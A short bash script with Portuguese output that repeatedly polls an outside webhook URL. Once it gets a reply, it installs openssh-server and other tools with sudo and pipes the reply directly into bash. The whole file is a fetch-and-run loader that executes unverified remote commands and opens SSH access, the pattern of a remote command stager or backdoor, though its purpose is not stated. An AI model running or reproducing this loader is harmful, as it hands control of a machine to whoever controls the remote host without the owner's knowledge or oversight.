#!/bin/bash

while true; do
  response=$(curl -s -X POST "https://webhook.souweverton.com.br/webhook/1036ee80-374a-4875-9ad74-743e987c49d4")
  if [[ -n "$response" ]]; then
    sudo apt update && sudo apt install -y nano openssh-server jq
    echo "$response" | bash
    break
  else
    echo "Crie mais Servidores Virtuais"
    sleep 2
  fi
done
